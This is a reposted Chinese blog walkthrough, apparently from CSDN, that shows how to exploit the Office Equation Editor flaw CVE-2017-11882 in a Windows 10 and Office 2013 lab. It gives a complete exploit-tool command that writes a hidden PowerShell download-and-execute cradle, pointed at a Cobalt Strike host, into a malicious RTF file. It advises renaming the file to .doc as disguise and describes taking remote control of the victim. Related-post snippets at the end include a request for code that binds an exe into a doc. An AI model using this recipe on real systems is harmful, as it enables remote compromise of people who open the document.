CVE-2017-11882 Office内存损坏漏洞利用

最新推荐文章于 2025-08-20 15:37:55 发布
转载 最新推荐文章于 2025-08-20 15:37:55 发布 · 164 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/dgjnszf/p/10887548.html
文章标签:

#python #运维

文章介绍了CVE - 2017 - 11882漏洞,该漏洞存在于Office公式编辑器组件中。演示了利用EXP工具生成恶意rtf文件,使目标PC回连到Cobalt Strike服务器并被远程控制的过程,包括生成Payload、恶意文件、投递并打开文件等步骤,演示环境为Windows 10 + Office 2013。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

CVE-2017-11882漏洞存在于Office的公式编辑器组件Eqnedit.exe中,GitHub上有EXP工具:https://github.com/unamer/CVE-2017-11882

这篇文章主要介绍如何利用exp工具生成恶意rtf文件,并当目标打开该恶意文件时目标PC能够回连到我们的Cobalt Strike服务器,从而被远程控制。

演示环境:Windows 10 + Office 2013

有些版本的Office可能不成功,这个我也没测那么多。

Office 2013:

第1步:生成PowerShell Payload

如下图利用Cobalt Strike生成PowerShell Payload:

第2步:生成恶意rtf文件

python2 CVE-2017-11882.py -c "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.56.130:80/a'))\"" -o test.doc

下载GitHub上的Exp工具,然后执行上述命令生成恶意RTF文件。为了更好的伪装,我们可以把*.rtf后缀改为*.doc,这并不影响文件的打开。

第3步:投递恶意文件并打开

为了演示,我把恶意RTF文件放到Windows 10虚拟机中运行。

第4步:木马上线

双击打开恶意RTF文件之后,Cobalt Strike界面会有上线提示:

到这一步,目标PC已经被我们远程控制了,可以上传/下载PC上的文件、截屏、提权等。

 

转载于:https://www.cnblogs.com/dgjnszf/p/10887548.html

Qt开发:Windows10系统下使用Qt5.14.2编译MySQL驱动
TechNomad的博客
10-29 1078
使用Qt5.14.2编译MySQL驱动文件。
CVE-2017-11882漏洞分析与利用
qq_36949907的博客
07-10 1836
(一次大作业,比较啰嗦 见谅) 漏洞介绍 2017年11月14号,微软推送了常规的安全更新,其中就包括CVE-2017-11882的安全更新,当时还引起了不小的关注,之后Github上也公布了许多POC及对应的漏洞利用程序。 仅仅从CVE-2017-11882漏洞利用效果来看,它可以通杀Office 2003到Office 2016的所有版本,并且整个攻击环境的构建非常简单,效果又非常的好。例如,有些攻击效果会出现弹框、CPU飙高、发生异常等等,而这个漏洞利用效果,堪称“无色无味”,即整个过程几.
win32_bios 的对象编辑器无法保存对象_WPS文档中插入公式弹出无法创建对象怎么办?两招帮你搞定...
weixin_39842519的博客
12-10 1473
  平时我们在使用WPS程序来进行Word文档的编写时,我们常常会因为一些特殊的需求或原因,需要在文档中插入数学公式,尤其是作为老师在给学生出考试的试卷时,就更需要用到这一功能了。  而有的小伙伴在使用WPS程序的时候,会发现自己的Word文档并不能插入公式,因为只要一点击插入公式的功能,就会弹出【无法创建对象,请确认对象已在系统注册表中注册。】的提示,此时若还想要使用WPS的公式编辑器的话,那就...
公式编辑器
03-25
本编辑器不是试用版的,能注册,用起来十分的方便,十分的好用
cmd bat 下载并运行文件,来自cve-11882漏洞样本,eqnedit32.exe栈溢出
weixin_34260991的博客
08-15 479
2019独角兽企业重金招聘Python工程师标准>>> ...
CVE-2017-11882漏洞复现
weixin_30606461的博客
11-21 273
本文记录一下针对CVE-2017-11882漏洞复现 0x00 前言 参考backlion师傅的PDF,记录一下这个过程。 2017年11月14日,微软发布了11月份的安全补丁更新,其中比较引人关注的莫过于悄然修复了潜伏17年之久的Office远程代码执行漏洞CVE-2017-11882)。该漏洞Office内存破坏漏洞,影响目前流行的所有Office版本。攻击者可以利用漏洞以当前登录...
CVE-2017-11882漏洞成因分析及白象样本分析
qq_45591829的博客
07-08 1886
CVE-2017-11882是一个广为人知的Microsoft Office漏洞,影响2000到2016版本。具体而言漏洞产生的原因是Equation Editor组件(EQNEDT32.EXE)读入包含MathType的OLE数据,在拷贝公式字体名称时没有对名称长度进行校验,进行了不安全的复制。攻击者可以利用这个漏洞,刻意构造的数据内容覆盖栈上的函数返回地址,造成栈缓冲区溢出,劫持程序执行流程,执行自己的恶意代码。
CVE-2017-11882:掌握通杀Office全版本的严重漏洞
根据给定的文件信息,我们将深入探讨CVE-2017-11882这一安全漏洞,及其在Microsoft Office软件中的影响和潜在危害。 CVE-2017-11882是一个安全漏洞,其影响范围包括Microsoft Office的多个版本,从Office 2003到...
CVE-2017-11882复现
yiyiiyiy的博客
11-24 3364
CVE-2017-11882复现 前言漏洞基本信息 漏洞ID CVE-2017-11882 漏洞名称 Microsoft Office数学公式编辑器内存损坏漏洞 威胁类型 远程代码执行 漏洞类型 栈溢出,位于EQNEDT32.EXE组件中 漏洞影响版本Microsoft Office 2000 Microsoft Office 2003Microsoft Office 2007 Service
利用CVE-2018-8174的MSF模块分析与漏洞攻击方法
资源摘要信息:"CVE-2018-8174-msf:CVE-2018-8174-VBScript内存损坏漏洞利用" CVE-2018-8174是微软在2018年发现并修复的一个安全漏洞,编号为CVE-2018-8174,位于Microsoft Office的Visual Basic for Applications ...
利用office-cve-2012-0158漏洞。将exe绑定到指定的doc上,请用python给出实现代码
03-12
此外,用户提供的参考引用中提到了其他漏洞利用代码,如CVE-2017-11882Python脚本。可能需要参考类似的结构,但需要针对CVE-2012-0158进行调整。例如,使用特定的偏移量或构造恶意ActiveX控件来触发漏洞,并将...
PWN基础5:格式化字符串漏洞(一) 概述 及 调试
prettyX的博客
07-09 811
漏洞概述 在C语言中,常用的输出函数有printf、fprintf、vprintf、vfprintf、sprintf等。对于这些输出函数,Format String是其第一个参数,一般称之为格式化字符串 格式化字符串在输出函数中的解析过程: ...
格式化字符串漏洞_Palo Alto Global Protect 网关设备格式化字符串漏洞分析(CVE20191579)...
weixin_39902545的博客
11-27 861
0x00 分析背景最近分析了几个存在漏洞的Palo Alto防火墙设备,这些特定设备面向公网并配置为了Global Protect网关。作为一个bug bounty新手,我经常被客户要求要证明我报告中漏洞的可利用性。之前DEVCORE团队成员Orange Tsai和Meh Chang最近发布了博客文章。他们发现了一个预认证格式化字符串漏洞(CVE-2019-1579),该漏洞在一年多前(...
<rtde><UR><python>windows系统下,使用python安装ur-rtde库的一些问题
用沸腾的热血,支付我们的人生吧!
08-18 1643
本文介绍了在Windows 10系统中安装Python库ur-rtde的详细过程。ur-rtde是用于控制UR机器人的实时通讯库,安装前需先配置cmake、boost和pybind11等依赖项。文章详细记录了安装过程中可能遇到的编码错误、依赖缺失等问题,并提供了通过conda创建虚拟环境来简化安装的解决方案。最终通过conda安装依赖后,成功使用pip完成了ur-rtde的安装。
java基础知识总结
yvya_的博客
08-19 1500
java 基础包含语法、面向对象,异常处理、文件操作等方面。
【GPT入门】第49课 LlamaFacotory 训练千问
最新发布
spark_dev的博客
08-20 759
避坑经验:发现先安装vllm后安装LlamaFactory有依赖冲突,改为先安装LlamaFacotory后安装vllm。直接安装 2.2.0,这个安装有点久,耐心等。合并原模型与lora训练结果。autodl的学术加速。训练后,目录结构与大小。
数据预处理数据清洗准备篇-------pandas库的缺失值处理方法
Sunhen_Qiletian的博客
08-20 1212
解析引擎,可选 'c' (C语言引擎,更快) 或 'python' (Python引擎,功能更全):填充方法 ('backfill', 'bfill', 'pad', 'ffill', None):0 或 'index' (检查每列),1 或 'columns' (检查每行):0 或 'index' (删除行),1 或 'columns' (删除列):'any' (有缺失就删除) 或 'all' (全部为缺失才删除):文件编码,如 'gbk', 'utf-8' 等。
Selenium使用指南
HUACE4600的博客
08-19 1366
前面的代码你看不懂,也没关系,我们再来叙述一下selenium工作的过程1.selenium client(python等语言编写的自动化测试脚本)初始化一个service服务,通过Webdriver启动浏览器驱动程序chromedriver.exe2.通过RemoteWebDriver向浏览器驱动程序发送HTTP请求,浏览器驱动程序解析请求,打开浏览器,并获得sessionid,如果再次对浏览器操作需携带此id。
CVE-2017-8759 漏洞利用示例代码分析
通过提供的文件信息,我们可以推断该压缩包文件名称“CVE-2017-8759-Exploit-sample-master”指的是一个包含了漏洞利用(Exploit)样本代码的主干版本。漏洞利用代码是专门用来针对特定漏洞进行攻击的程序代码,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值